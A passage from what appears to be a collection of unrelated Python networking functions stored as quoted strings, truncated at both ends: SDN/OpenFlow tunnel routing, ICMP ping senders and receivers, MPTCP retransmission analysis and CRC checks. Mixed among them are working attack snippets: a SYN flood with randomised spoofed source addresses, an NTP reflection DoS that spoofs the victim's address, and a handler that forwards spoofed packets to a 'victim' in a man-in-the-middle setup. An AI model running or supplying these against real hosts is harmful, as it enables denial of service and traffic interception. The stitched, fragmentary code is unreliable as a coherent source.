routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def onPing(self, payload):", "def send_one_ping(my_socket, dest_addr, id):\n dest_addr = socket.gethostbyname(dest_addr)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n my_checksum = 0\n\n # Make a dummy heder with a 0 checksum.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, my_checksum, id, 1)\n bytes_in_double = struct.calcsize(\"d\")\n data = (192 - bytes_in_double) * \"Q\"\n data = struct.pack(\"d\", time.time()) + data\n\n # Calculate the checksum on the data and the dummy header.\n my_checksum = checksum(header + data)\n\n # Now that we have the right checksum, we put that in. It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = struct.pack(\n \"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), id, 1\n )\n packet = header + data\n my_socket.sendto(packet, (dest_addr, 1)) # Don't know about the 1", "def send_p():\n while 1:\n if PACKET_QUEUE:\n mpkt = PACKET_QUEUE.pop()\n sendp(mpkt, iface=IFACE, loop=0) # forward spoofed packet to the victim", "def scapy_create_send_ICMP_customized(self, ipdst, ipsrc, send1=True, \\\n macdst=None, macsrc=None):\n ip_header = self.define_ip_header(dst=ipdst, src=ipsrc,\\\n ttl=self.ipttl, version=self.version)\n icmp_header = self.define_icmp_header(version=self.version)\n if send1:\n if (macdst == None):\n send(ip_header/icmp_header, verbose=self.verbose)\n else:\n ether_header = self.define_ethernet_header(src=macsrc, \\\n dst=macdst)\n sendp(ether_header/ip_header/icmp_header, verbose=self.verbose, \\\n iface=self.sourceiface)\n return\n\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n send(ip_header/icmp_header, count=pktcount, inter=self.interval/1000.0,\n verbose=self.verbose)", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def main():\n args = TrafficScriptArg(\n [u\"src_mac\", u\"dst_mac\", u\"src_ip\", u\"dst_ip\", u\"dscp\"]\n )\n\n rxq = RxQueue(args.get_arg(u\"rx_if\"))\n txq = TxQueue(args.get_arg(u\"tx_if\"))\n\n src_mac = args.get_arg(u\"src_mac\")\n dst_mac = args.get_arg(u\"dst_mac\")\n src_ip = args.get_arg(u\"src_ip\")\n dst_ip = args.get_arg(u\"dst_ip\")\n dscp = int(args.get_arg(u\"dscp\"))\n\n ip_layer = IPv6 if ip_address(src_ip).version == 6 else IP\n\n sent_packets = list()\n pkt_send = (Ether(src=src_mac, dst=dst_mac) /\n ip_layer(src=src_ip, dst=dst_ip) /\n TCP())\n\n pkt_send /= Raw()\n sent_packets.append(pkt_send)\n txq.send(pkt_send)\n\n while True:\n pkt_recv = rxq.recv(2, sent_packets)\n if pkt_recv is None:\n raise RuntimeError(u\"ICMPv6 echo reply Rx timeout\")\n\n if pkt_recv.haslayer(ICMPv6ND_NS):\n # read another packet in the queue if the current one is ICMPv6ND_NS\n continue\n elif pkt_recv.haslayer(ICMPv6MLReport2):\n # read another packet in the queue if the current one is\n # ICMPv6MLReport2\n continue\n elif pkt_recv.haslayer(ICMPv6ND_RA):\n # read another packet in the queue if the current one is\n # ICMPv6ND_RA\n continue\n\n # otherwise process the current packet\n break\n\n if pkt_recv is None:\n raise RuntimeError(u\"Rx timeout\")\n\n if ip_layer == IP:\n check_ipv4(pkt_recv, dscp)\n else:\n check_ipv6(pkt_recv, dscp)\n\n sys.exit(0)", "def SynAckAttack(host, cmds):\n\tprint(\"\\n###########################################\")\n\tprint(\"# Starting SYN ACK Attack..\")\n\tprint(\"###########################################\\n\")\n\t# ports=[]\n\ttry:\n\t\tamount = int(cmds[3])\n\texcept IndexError:\n\t\tamount = 1\n\ttry:\n\t\tports = cmds[2]\n\t\tports = [int(p) for p in ports.split('.')]\n\texcept IndexError:\n\t\tports = []\n\n\t# hosts = state.host_and_ports.keys()\n\t# ports = []\n\tif not ports:\n\t\tprint(\"***\\n[e]: No ports were specifed, please enter them like so: 80,81,88,3000\")\n\t\tprint(\"[cmds]: \", cmds)\n\t\tprint()\n\t\treturn\n\ttry:\n\t\t\t# for host in hosts:\n\t#\tprint(f\"# Attacking Target: {host}\")\n\t\tfor hostPort in ports:\n\t\t\tfor x in range(0, amount):\n\t\t\t\t# Build a random packet\n\t\t\t\ts_port = randInt()\n\t\t\t\ts_eq = randInt()\n\t\t\t\tw_indow = randInt()\n\n\t\t\t\tIP_Packet = IP()\n\t\t\t\tIP_Packet.src = randomIP()\n\t\t\t\tIP_Packet.dst = host\n\n\t\t\t\tTCP_Packet = TCP()\n\t\t\t\tTCP_Packet.sport = s_port\n\t\t\t\tTCP_Packet.dport = hostPort\n\t\t\t\tTCP_Packet.flags = \"S\"\n\t\t\t\tTCP_Packet.seq = s_eq\n\t\t\t\tTCP_Packet.window = w_indow\n\n\t\t\t\t# Send the packet\n\t\t\t\tsend(IP_Packet/TCP_Packet)\n\t\tprint()\n\t\tprint('***')\n\t\tprint(\"packets explanation:\")\n\t\tprint(\"sent %s packets of this form: \" % amount)\n\t\tIP_Packet.show()\n\t\tprint(\"ihl: internet header length\")\n\t\tprint(\"tos: type of service\")\n\t\tprint(\"frag: fragement offset\")\n\t\tprint(\"ttl: time to live [s]\")\n\t\tprint(\"proto: Protocol num, 0 = IPv6\")\n\t\tprint(\"chksum: check sum for error checking\")\n\t\tprint(\"***\")\n\t\tprint('TCP SYN packet: ')\n\t\tTCP_Packet.show()\n\t\tprint(\"sport: identifies sending port\")\n\t\tprint(\"dport: identifies receiving port\")\n\t\tprint(\"seq: seqence number. Dual role. If SYN flag is set (1), it's initial seqence number.\")\n\t\tprint(\" if flag is clear (0) this is accumulated seqence number for current session.\")\n\t\tprint(\"ack: ack number. If ACK flag set then this value is what sender of ACK expects to get back\")\n\t\tprint(\"dataofs: specifies the size of the TCP header in 32-bit words\")\n\t\tprint(\"flags: there are 9 1-bit flags\")\n\t\tprint(\"window: size of data windows sender of segment willing to receive back\")\n\t\tprint(\"chksum: error checking checksum\")\n\t\tprint(\"urgptr: position offset from the seqence number of last urgent data byte.\")\n\t\t# get grasp of all flags set in the Scapy TCP packet\n\t\t# obv, it's going to just be SYN, set with 'S'\n\t\tflags_vals = {\n\t\t\t'F': 0,\n\t\t\t'S': 0,\n\t\t\t'R': 0,\n\t\t\t'P': 0,\n\t\t\t'A': 0,\n\t\t\t'U': 0,\n\t\t\t'E': 0,\n\t\t\t'C': 0,\n\t\t}\n\t\tflags = {\n\t\t\t'F': 'FIN',\n\t\t\t'S': 'SYN',\n\t\t\t'R': 'RST',\n\t\t\t'P': 'PSH',\n\t\t\t'A': 'ACK',\n\t\t\t'U': 'URG',\n\t\t\t'E': 'ECE',\n\t\t\t'C': 'CWR',\n\t\t\t}\n\t\tfor f in TCP_Packet.sprintf('%TCP.flags%'):\n\t\t\tflags_vals[f] = 1\n\t\tprint('flags set in TCP SYN packet')\n\t\tprint([flags[x] for x in TCP_Packet.sprintf('%TCP.flags%')])\n\t\tprint(flags_vals)\n\texcept Exception as e:\n\t\tprint('in ping flood: ')\n\t\tprint('something was wrong with arguments: ', cmds)\n\t\tprint('\\n', e)\n\t\treturn", "def recv(sock: socket.socket, dest: io.BufferedIOBase) -> int:\r\n pktsRecv = []\r\n acksSent = []\r\n pause = .1\r\n num_bytes = 0\r\n while True:\r\n # Receive packets\r\n data = sock.recv(util.MAX_PACKET)\r\n if not data:\r\n break\r\n message, seq_num = getInfo(data)\r\n print(\"***********************************************************\")\r\n print(\"Received sequence number:\" , seq_num)\r\n # Create and send acks\r\n ack_num = int(seq_num) + len(message)\r\n ack = ack_num.to_bytes(3, \"big\")\r\n print(\"Sending ack:\", ack_num)\r\n if ack_num not in acksSent:\r\n dest.write(bytes(str.encode(message)))\r\n dest.flush()\r\n acksSent.append(ack_num)\r\n pktsRecv.append(bytes(str.encode(message)))\r\n sock.send(ack)\r\n num_bytes += len(message)\r\n return num_bytes", "def ping(self,dest):\n\t\tself.tn.write('ping -c 4 %s\\n'%(dest))\n\t\tself.tn.write('exit\\n')\n\t\tresp = self.tn.read_all()\n\t\treturn resp", "def dosEm(target, ntplist, data, currentserver):\n ntpserver = ntplist[currentserver] #LOAD THE SERVER\n packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #CONSTRUIRE LE PAQUER\n send(packet,loop=1) #ENVOYER ", "def process_mptcp_pkt_from_client(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n flow_id = acks[saddr, sport, daddr, dport][co.FLOW_ID]\n if conn_acks[conn_id][co.S2C] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.S2C]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_C2S] and (dss - conn_acks[conn_id][co.C2S]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.C2S][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission! (take into account the seq overflow)\n mptcp_connections[conn_id].attr[co.C2S][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_C2S][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_C2S][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]))\n conn_acks[conn_id][HSEQ_C2S][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_C2S].add(dss)\n conn_acks[conn_id][HSEQ_C2S][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][CLIENT]]\n\n conn_acks[conn_id][co.S2C] = dack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][CLIENT] = ts_delta", "def sendPing(self, payload=None):", "def receive_ping(my_socket, timeout):\n start_time = timeout\n while True:\n start_select = time.process_time()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.process_time() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.process_time()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n icmp_buff= rec_packet[28 : ]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n #if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n if ip_type != 8: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n else:\n print('Got icmp:')\n print(icmp_buff)\n return timeout\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def validate_ping(result):\n if '0 packets received' in str(result) or 'no answer from' in str(result) or '0 received' in str(result):\n print 'Conectividade - DOWN'\n return False\n print 'Conectividade - OK'\n return True", "def hmVerifyMsgCRCOK(destination, protocol, source, expectedFunction, expectedLength, datal) :\r\n badresponse = 0\r\n if protocol == constants.HMV3_ID:\r\n checksum = datal[len(datal)-2:]\r\n rxmsg = datal[:len(datal)-2]\r\n crc = crc16() # Initialises the CRC\r\n expectedchecksum = crc.run(rxmsg)\r\n if expectedchecksum == checksum:\r\n print(\"CRC is correct\")\r\n else:\r\n print(\"CRC is INCORRECT\")\r\n s = \"Incorrect CRC: %s Expected: %s \\n\" % (datal, expectedchecksum)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n # Check the response\r\n dest_addr = datal[0]\r\n frame_len_l = datal[1]\r\n frame_len_h = datal[2]\r\n frame_len = (frame_len_h << 8) | frame_len_l\r\n source_addr = datal[3]\r\n func_code = datal[4]\r\n\r\n\r\n\r\n if (dest_addr != 129 and dest_addr != 160):\r\n print(\"dest_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (dest_addr != destination):\r\n print(\"dest_addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr < 1 or source_addr > 32):\r\n print(\"source_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr != source):\r\n print(\"source addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != constants.FUNC_WRITE and func_code != constants.FUNC_READ):\r\n print(\"Func Code is UNKNWON\")\r\n s = \"%s : Controller %s : Unknown Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != expectedFunction):\r\n print(\"Func Code is UNEXPECTED\")\r\n s = \"%s : Controller %s : Unexpected Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code == constants.FUNC_WRITE and frame_len != 7):\r\n # Reply to Write is always 7 long\r\n print(\"response length is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (len(datal) != frame_len):\r\n print(\"response length MISMATCHES header\")\r\n s = \"%s : Controller %s : Mismatch length: %s %s\\n\" % (localtime, loop, len(datal), frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n \"\"\"if (func_code == constants.FUNC_READ and expectedLength !=len(datal) ):\r\n # Read response length is wrong\r\n print(\"response length not EXPECTED value\")\r\n print(len(datal))\r\n print(datal)\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\"\"\"\r\n if (badresponse == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n assert 0, \"Un-supported protocol found %s\" % protocol", "def ping(msg):\n return msg", "def _send(self,msg):\n attempts = 3\n while attempts > 0:\n self.sock.sendto(msg, self.ip_port)\n ready = select.select([self.sock], [], [], self.timeout)\n if ready[0]:\n data, ip_port = self.sock.recvfrom(60)\n if ip_port != self.ip_port: continue\n return decode(data)\n attempts -= 1\n print(\"Retrying send\")\n return None", "def process_mptcp_pkt_from_server(ts_delta, acks, conn_acks, mptcp_connections, tcp, ip, saddr, daddr, sport, dport):\n dss, dack, dss_is_8_bytes = get_dss_and_data_ack(tcp)\n conn_id = acks[daddr, dport, saddr, sport][co.CONN_ID]\n flow_id = acks[daddr, dport, saddr, sport][co.FLOW_ID]\n if conn_acks[conn_id][co.C2S] >= 0:\n max_val = 2**64 if dss_is_8_bytes else 2**32\n bytes_acked = (dack - conn_acks[conn_id][co.C2S]) % max_val\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n if (size_payload > 0 and dss in conn_acks[conn_id][SEQ_S2C] and (dss - conn_acks[conn_id][co.S2C]) % max_val < 2000000000\n and (mptcp_connections[conn_id].attr[co.S2C][co.TIME_LAST_ACK_TCP] - ts_delta).total_seconds() > 0.0):\n # This is a DSS retransmission!\n mptcp_connections[conn_id].attr[co.S2C][co.RETRANS_DSS].append((ts_delta, flow_id, dss, conn_acks[conn_id][HSEQ_S2C][dss][2],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][0],\n ts_delta - conn_acks[conn_id][HSEQ_S2C][dss][1],\n ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]))\n conn_acks[conn_id][HSEQ_S2C][dss][1] = ts_delta\n elif size_payload > 0 and dss is not False:\n conn_acks[conn_id][SEQ_S2C].add(dss)\n conn_acks[conn_id][HSEQ_S2C][dss] = [ts_delta, ts_delta, ts_delta - conn_acks[conn_id][co.TIMESTAMP][SERVER]]\n\n conn_acks[conn_id][co.C2S] = dack\n acks[daddr, dport, saddr, sport][co.TIMESTAMP][SERVER] = ts_delta\n conn_acks[conn_id][co.TIMESTAMP][SERVER] = ts_delta", "def on_ctcp(self, raw_msg, source, msg, **kwargs):", "def process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag):\n if acks[saddr, sport, daddr, dport][co.S2C] >= 0:\n conn_id = acks[saddr, sport, daddr, dport][co.CONN_ID]\n connections[conn_id].flow.attr[co.S2C][co.TIME_LAST_ACK_TCP] = ts_delta\n if fin_flag:\n connections[conn_id].flow.attr[co.S2C][co.TIME_FIN_ACK_TCP] = ts_delta\n\n bytes_acked = (tcp.ack - acks[saddr, sport, daddr, dport][co.S2C]) % 4294967296\n if bytes_acked >= 2000000000:\n # Ack of 2GB or more is just not possible here\n return\n\n increment_value_dict(nb_acks[co.S2C][conn_id], bytes_acked)\n size_payload = ip.len - ip.hl * 4 - tcp.off * 4\n\n # If SOCKS command\n if size_payload == 7 and connections[conn_id].attr.get(co.SOCKS_PORT, None) is None:\n crypted_socks_cmd = tcp.data\n # This is possible because of packet stripping\n if len(crypted_socks_cmd) == 7:\n decrypted_socks_cmd = socks_parser.decode(crypted_socks_cmd)\n if decrypted_socks_cmd[0] == b'\\x01': # Connect\n connections[conn_id].attr[co.SOCKS_DADDR] = socks_parser.get_ip_address(decrypted_socks_cmd)\n connections[conn_id].attr[co.SOCKS_PORT] = socks_parser.get_port_number(decrypted_socks_cmd)\n\n if size_payload > 0 and tcp.seq in acks[saddr, sport, daddr, dport][SEQ_C2S]:\n # This is a retransmission! (take into account the seq overflow)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIMESTAMP_RETRANS].append((ts_delta,\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][0],\n ts_delta - acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1],\n ts_delta - acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT]))\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq][1] = ts_delta\n elif size_payload > 0:\n acks[saddr, sport, daddr, dport][SEQ_C2S].add(tcp.seq)\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_WITH_RETRANS_TCP] = ts_delta\n connections[conn_id].flow.attr[co.C2S][co.TIME_LAST_PAYLD_TCP] = ts_delta\n acks[saddr, sport, daddr, dport][HSEQ_C2S][tcp.seq] = [ts_delta, ts_delta]\n # Don't think will face this issue\n# if len(acks[saddr, sport, daddr, dport][SEQ][co.C2S]) >= 3000000:\n# for x in range(50000):\n# acks[saddr, sport, daddr, dport][SEQ][co.C2S].popleft()\n\n acks[saddr, sport, daddr, dport][co.S2C] = tcp.ack\n acks[saddr, sport, daddr, dport][co.TIMESTAMP][CLIENT] = ts_delta", "def send_one_ping(self, current_socket):\n from struct import pack\n from sys import byteorder\n\n def calculate_checksum(source_string):\n \"\"\"A port of the functionality of in_cksum() from ping.c\n Ideally this would act on the string as a series of 16-bit ints (host\n packed), but this works.\n Network data is big-endian, hosts are typically little-endian\n \"\"\"\n countTo = (int(len(source_string) / 2)) * 2\n sum = 0\n count = 0\n\n # Handle bytes in pairs (decoding as short ints)\n loByte = 0\n hiByte = 0\n while count < countTo:\n if (byteorder == \"little\"):\n loByte = source_string[count]\n hiByte = source_string[count + 1]\n else:\n loByte = source_string[count + 1]\n hiByte = source_string[count]\n sum = sum + (ord(hiByte) * 256 + ord(loByte))\n count += 2\n\n # Handle last byte if applicable (odd-number of bytes)\n # Endianness should be irrelevant in this case\n if countTo < len(source_string): # Check for odd length\n loByte = source_string[len(source_string) - 1]\n sum += ord(loByte)\n\n sum &= 0xffffffff # Truncate sum to 32 bits (a variance from ping.c, which\n # uses signed ints, but overflow is unlikely in ping)\n\n sum = (sum >> 16) + (sum & 0xffff) # Add high 16 bits to low 16 bits\n sum += (sum >> 16) # Add carry from above (if any)\n answer = ~sum & 0xffff # Invert and truncate to 16 bits\n answer = socket.htons(answer)\n\n return answer\n\n ICMP_ECHO = 8 # Echo request (per RFC792)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n checksum = 0\n\n # Make a dummy header with a 0 checksum.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n padBytes = []\n startVal = 0x42\n for i in range(startVal, startVal + (self.packet_size)):\n padBytes += [(i & 0xff)] # Keep chars in the 0-255 range\n data = bytes(padBytes)\n\n # Calculate the checksum on the data and the dummy header.\n checksum = calculate_checksum(header + data) # Checksum is in network order\n\n # Now that we have the right checksum, we put that in. It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n packet = header + data\n\n send_time = self.timer()\n\n try:\n current_socket.sendto(packet, (self.destination, 1)) # Port number is irrelevant for ICMP\n except socket.error as e:\n current_socket.close()\n return\n\n return send_time", "def receive_one_ping(mySocket, myID, timeout):\n timeLeft = timeout/1000\n\n while True: # Loop enquanto aguarda o pacote ou o timeout \n startedSelect = default_timer() # Essa função retorna o tempo de espera junto com o tempo da CPU e depende da plataforma. \n\n whatReady = select.select([mySocket], [], [], timeLeft)\n howLongInSelect = (default_timer() - startedSelect)\n if whatReady[0] == []: # timeout\n return None, 0, 0, 0, 